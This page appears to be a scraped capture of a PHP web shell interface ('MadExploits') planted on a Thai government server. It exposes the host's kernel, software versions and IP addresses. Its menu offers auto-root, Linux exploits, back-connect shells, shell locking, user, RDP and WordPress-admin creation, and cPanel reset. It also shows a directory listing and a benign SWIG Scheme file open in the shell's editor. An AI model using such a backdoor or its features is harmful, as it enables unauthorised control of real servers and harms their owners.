Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
swig /
1.3.40 /
guile /
[ HOME SHELL ]
Name
Size
Permission
Action
common.scm
2.58
KB
-rw-r--r--
cplusplus.i
911
B
-rw-r--r--
ghinterface.i
1.65
KB
-rw-r--r--
guile.i
1.21
KB
-rw-r--r--
guile_gh.swg
2.2
KB
-rw-r--r--
guile_gh_run.swg
6.8
KB
-rw-r--r--
guile_scm.swg
1.52
KB
-rw-r--r--
guile_scm_run.swg
13.51
KB
-rw-r--r--
guilemain.i
1.19
KB
-rw-r--r--
interpreter.i
1.55
KB
-rw-r--r--
list-vector.i
17.86
KB
-rw-r--r--
pointer-in-out.i
3.41
KB
-rw-r--r--
ports.i
1.47
KB
-rw-r--r--
std_common.i
736
B
-rw-r--r--
std_deque.i
28
B
-rw-r--r--
std_except.i
182
B
-rw-r--r--
std_map.i
58.8
KB
-rw-r--r--
std_pair.i
39.34
KB
-rw-r--r--
std_string.i
2.46
KB
-rw-r--r--
std_vector.i
16.5
KB
-rw-r--r--
stl.i
519
B
-rw-r--r--
swigrun.i
965
B
-rw-r--r--
typemaps.i
14.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common.scm
;;;************************************************************************ ;;;*common.scm ;;;* ;;;* This file contains generic SWIG GOOPS classes for generated ;;;* GOOPS file support ;;;* ;;;* Copyright (C) 2003 John Lenz (jelenz@wisc.edu) ;;;* Copyright (C) 2004 Matthias Koeppe (mkoeppe@mail.math.uni-magdeburg.de) ;;;* ;;;* This file may be freely redistributed without license or fee provided ;;;* this copyright message remains intact. ;;;************************************************************************ (define-module (Swig swigrun)) (define-module (Swig common) #:use-module (oop goops) #:use-module (Swig swigrun)) (define-class <swig-metaclass> (<class>) (new-function #:init-value #f)) (define-method (initialize (class <swig-metaclass>) initargs) (slot-set! class 'new-function (get-keyword #:new-function initargs #f)) (next-method)) (define-class <swig> () (swig-smob #:init-value #f) #:metaclass <swig-metaclass> ) (define-method (initialize (obj <swig>) initargs) (next-method) (slot-set! obj 'swig-smob (let ((arg (get-keyword #:init-smob initargs #f))) (if arg arg (let ((ret (apply (slot-ref (class-of obj) 'new-function) (get-keyword #:args initargs '())))) ;; if the class is registered with runtime environment, ;; new-Function will return a <swig> goops class. In that case, extract the smob ;; from that goops class and set it as the current smob. (if (slot-exists? ret 'swig-smob) (slot-ref ret 'swig-smob) ret)))))) (define (display-address o file) (display (number->string (object-address o) 16) file)) (define (display-pointer-address o file) ;; Don't fail if the function SWIG-PointerAddress is not present. (let ((address (false-if-exception (SWIG-PointerAddress o)))) (if address (begin (display " @ " file) (display (number->string address 16) file))))) (define-method (write (o <swig>) file) ;; We display _two_ addresses to show the object's identity: ;; * first the address of the GOOPS proxy object, ;; * second the pointer address. ;; The reason is that proxy objects are created and discarded on the ;; fly, so different proxy objects for the same C object will appear. (let ((class (class-of o))) (if (slot-bound? class 'name) (begin (display "#<" file) (display (class-name class) file) (display #\space file) (display-address o file) (display-pointer-address o file) (display ">" file)) (next-method)))) (export <swig-metaclass> <swig>) ;;; common.scm ends here
Close